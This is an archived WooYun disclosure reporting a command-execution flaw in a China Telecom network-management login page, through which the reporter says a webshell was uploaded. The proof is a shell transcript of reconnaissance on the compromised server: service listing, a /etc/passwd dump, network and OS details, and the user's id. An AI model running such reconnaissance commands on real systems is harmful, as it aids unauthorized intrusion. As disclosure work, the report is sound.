当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160648

漏洞标题:中国电信集团股份有限公司某系统服务器Getshell

相关厂商:中国电信

漏洞作者: 朱元璋

提交时间:2015-12-12 10:56

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-12: 细节已通知厂商并且等待厂商处理中
2015-12-16: 厂商已经确认,细节仅向厂商公开
2015-12-26: 细节向核心白帽子及相关领域专家公开
2016-01-05: 细节向普通白帽子公开
2016-01-15: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

详细说明:

00.jpg

0.png


链接地址http://**.**.**.**:59009/VIPNMS/login.action存在命令执行漏洞

000.png


直接上传木马到服务器

1.jpg

2.jpg

漏洞证明:

[/inm/nmsapp/opt/tomcat/tomcat3/webapps/VIPNMS/VIPNMS/]$ chkconfig --list
NetworkManager 	0:off	1:off	2:off	3:off	4:off	5:off	6:off
abrt-ccpp      	0:off	1:off	2:off	3:off	4:off	5:off	6:off
abrt-oops      	0:off	1:off	2:off	3:off	4:off	5:off	6:off
abrtd          	0:off	1:off	2:off	3:off	4:off	5:off	6:off
acpid          	0:off	1:off	2:off	3:off	4:off	5:off	6:off
atd            	0:off	1:off	2:off	3:off	4:off	5:off	6:off
auditd         	0:off	1:off	2:on	3:on	4:on	5:off	6:off
autofs         	0:off	1:off	2:off	3:off	4:off	5:off	6:off
avahi-daemon   	0:off	1:off	2:off	3:off	4:off	5:off	6:off
bluetooth      	0:off	1:off	2:off	3:off	4:off	5:off	6:off
certmonger     	0:off	1:off	2:off	3:off	4:off	5:off	6:off
cgconfig       	0:off	1:off	2:on	3:on	4:on	5:on	6:off
cgred          	0:off	1:off	2:off	3:off	4:off	5:off	6:off
cpuspeed       	0:off	1:on	2:off	3:off	4:off	5:off	6:off
crond          	0:off	1:off	2:on	3:on	4:on	5:on	6:off
cups           	0:off	1:off	2:off	3:off	4:off	5:off	6:off
dnsmasq        	0:off	1:off	2:off	3:off	4:off	5:off	6:off
ebtables       	0:off	1:off	2:off	3:off	4:off	5:off	6:off
firstboot      	0:off	1:off	2:off	3:off	4:off	5:off	6:off
haldaemon      	0:off	1:off	2:off	3:on	4:on	5:on	6:off
httpd          	0:off	1:off	2:off	3:off	4:off	5:off	6:off
ip6tables      	0:off	1:off	2:off	3:off	4:off	5:off	6:off
iptables       	0:off	1:off	2:off	3:off	4:off	5:off	6:off
irqbalance     	0:off	1:off	2:off	3:on	4:on	5:on	6:off
iscsi          	0:off	1:off	2:off	3:on	4:on	5:on	6:off
iscsid         	0:off	1:off	2:off	3:on	4:on	5:on	6:off
kdump          	0:off	1:off	2:on	3:on	4:on	5:on	6:off
ksm            	0:off	1:off	2:off	3:on	4:on	5:on	6:off
ksmtuned       	0:off	1:off	2:off	3:on	4:on	5:on	6:off
libvirt-guests 	0:off	1:off	2:on	3:on	4:on	5:on	6:off
libvirtd       	0:off	1:off	2:off	3:on	4:on	5:on	6:off
lvm2-monitor   	0:off	1:on	2:on	3:on	4:on	5:on	6:off
matahari-broker	0:off	1:off	2:off	3:off	4:off	5:off	6:off
matahari-host  	0:off	1:off	2:off	3:off	4:off	5:off	6:off
matahari-network	0:off	1:off	2:off	3:off	4:off	5:off	6:off
matahari-service	0:off	1:off	2:off	3:off	4:off	5:off	6:off
matahari-sysconfig	0:off	1:off	2:off	3:off	4:off	5:off	6:off
mdmonitor      	0:off	1:off	2:off	3:off	4:off	5:off	6:off
messagebus     	0:off	1:off	2:on	3:on	4:on	5:on	6:off
netconsole     	0:off	1:off	2:off	3:off	4:off	5:off	6:off
netfs          	0:off	1:off	2:off	3:off	4:off	5:off	6:off
network        	0:off	1:off	2:on	3:on	4:on	5:on	6:off
nfs            	0:off	1:off	2:off	3:off	4:off	5:off	6:off
nfslock        	0:off	1:off	2:off	3:off	4:off	5:off	6:off
ntpd           	0:off	1:off	2:off	3:off	4:off	5:off	6:off
ntpdate        	0:off	1:off	2:off	3:off	4:off	5:off	6:off
oddjobd        	0:off	1:off	2:off	3:off	4:off	5:off	6:off
portreserve    	0:off	1:off	2:on	3:on	4:on	5:on	6:off
postfix        	0:off	1:off	2:off	3:off	4:off	5:off	6:off
psacct         	0:off	1:off	2:off	3:off	4:off	5:off	6:off
qpidd          	0:off	1:off	2:on	3:on	4:on	5:on	6:off
quota_nld      	0:off	1:off	2:off	3:off	4:off	5:off	6:off
radvd          	0:off	1:off	2:off	3:off	4:off	5:off	6:off
rdisc          	0:off	1:off	2:off	3:off	4:off	5:off	6:off
restorecond    	0:off	1:off	2:off	3:off	4:off	5:off	6:off
rhnsd          	0:off	1:off	2:on	3:on	4:on	5:on	6:off
rhsmcertd      	0:off	1:off	2:off	3:on	4:on	5:on	6:off
rpcbind        	0:off	1:off	2:on	3:on	4:on	5:on	6:off
rpcgssd        	0:off	1:off	2:off	3:off	4:off	5:off	6:off
rpcidmapd      	0:off	1:off	2:off	3:off	4:off	5:off	6:off
rpcsvcgssd     	0:off	1:off	2:off	3:off	4:off	5:off	6:off
rsyslog        	0:off	1:off	2:on	3:on	4:on	5:on	6:off
salt-minion    	0:off	1:off	2:on	3:on	4:on	5:on	6:off
saslauthd      	0:off	1:off	2:off	3:off	4:off	5:off	6:off
smartd         	0:off	1:off	2:off	3:off	4:off	5:off	6:off
snmpd          	0:off	1:off	2:off	3:off	4:off	5:off	6:off
snmptrapd      	0:off	1:off	2:off	3:off	4:off	5:off	6:off
spice-vdagentd 	0:off	1:off	2:off	3:off	4:off	5:on	6:off
sshd           	0:off	1:off	2:on	3:on	4:on	5:on	6:off
sssd           	0:off	1:off	2:off	3:off	4:off	5:off	6:off
sysstat        	0:off	1:on	2:on	3:on	4:on	5:on	6:off
udev-post      	0:off	1:on	2:on	3:on	4:on	5:on	6:off
virt-who       	0:off	1:off	2:on	3:on	4:on	5:on	6:off
vmware-tools   	0:off	1:off	2:on	3:on	4:on	5:on	6:off
wdaemon        	0:off	1:off	2:off	3:off	4:off	5:off	6:off
wpa_supplicant 	0:off	1:off	2:off	3:off	4:off	5:off	6:off
ypbind         	0:off	1:off	2:off	3:off	4:off	5:off	6:off
/bin/sh: line 0: cd: /inm/nmsapp/opt/tomcat/tomcat3/webapps/VIPNMS/VIPNMS/: No such file or directory
[/inm/nmsapp/opt/tomcat/tomcat1/bin/]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
saslauth:x:498:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
qpidd:x:497:496:Owner of Qpidd Daemons:/var/lib/qpidd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
pulse:x:496:494:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
ctinm:x:500:500:ctinm:/home/ctinm:/bin/bash
ultrainm:x:901:900::/home/ultrainm:/bin/bash
nmsapp:x:902:902::/inm/nmsapp:/bin/bash
patrol:x:911:900::/home/patrol:/bin/bash
ctsi:x:920:920::/inm/ctsi:/bin/bash
[/inm/nmsapp/opt/tomcat/tomcat1/bin/]$ ifconfig
eth1      Link encap:Ethernet  HWaddr 02:00:74:55:00:22  
          inet addr:**.**.**.**  Bcast:**.**.**.**  Mask:**.**.**.**
          inet6 addr: fe80::74ff:fe55:22/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:155790146 errors:0 dropped:0 overruns:0 frame:0
          TX packets:79493301 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:85258288251 (79.4 GiB)  TX bytes:18338520710 (17.0 GiB)
lo        Link encap:Local Loopback  
          inet addr:**.**.**.**  Mask:**.**.**.**
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:129344319 errors:0 dropped:0 overruns:0 frame:0
          TX packets:129344319 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:6468625231 (6.0 GiB)  TX bytes:6468625231 (6.0 GiB)
[/inm/nmsapp/opt/tomcat/tomcat1/bin/]$ cat /etc/resolv.conf
# Generated by NetworkManager
# No nameservers found; try putting DNS servers into your
# ifcfg files in /etc/sysconfig/network-scripts like so:
#
# DNS1=xxx.xxx.xxx.xxx
# DNS2=xxx.xxx.xxx.xxx
# DOMAIN=**.**.**.** **.**.**.**
[/inm/nmsapp/opt/tomcat/tomcat1/bin/]$ bash prompt:
bash: prompt:: No such file or directory
[/inm/nmsapp/opt/tomcat/tomcat1/bin/]$ lsb_release -a
LSB Version:	:core-4.0-amd64:core-4.0-noarch:graphics-4.0-amd64:graphics-4.0-noarch:printing-4.0-amd64:printing-4.0-noarch
Distributor ID:	RedHatEnterpriseServer
Description:	Red Hat Enterprise Linux Server release 6.2 (Santiago)
Release:	6.2
Codename:	Santiago
[/inm/nmsapp/opt/tomcat/tomcat1/bin/]$ uname -a
Linux inmlcntest01 2.6.32-220.el6.x86_64 #1 SMP Wed Nov 9 08:03:13 EST 2011 x86_64 x86_64 x86_64 GNU/Linux
[/inm/nmsapp/opt/tomcat/tomcat1/bin/]$ id
uid=902(nmsapp) gid=902(nmsapp) groups=902(nmsapp),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[/inm/nmsapp/opt/tomcat/tomcat1/bin/]$

修复方案:

加强安全意识

版权声明:转载请注明来源 朱元璋@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-12-16 19:08

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置。

最新状态:

暂无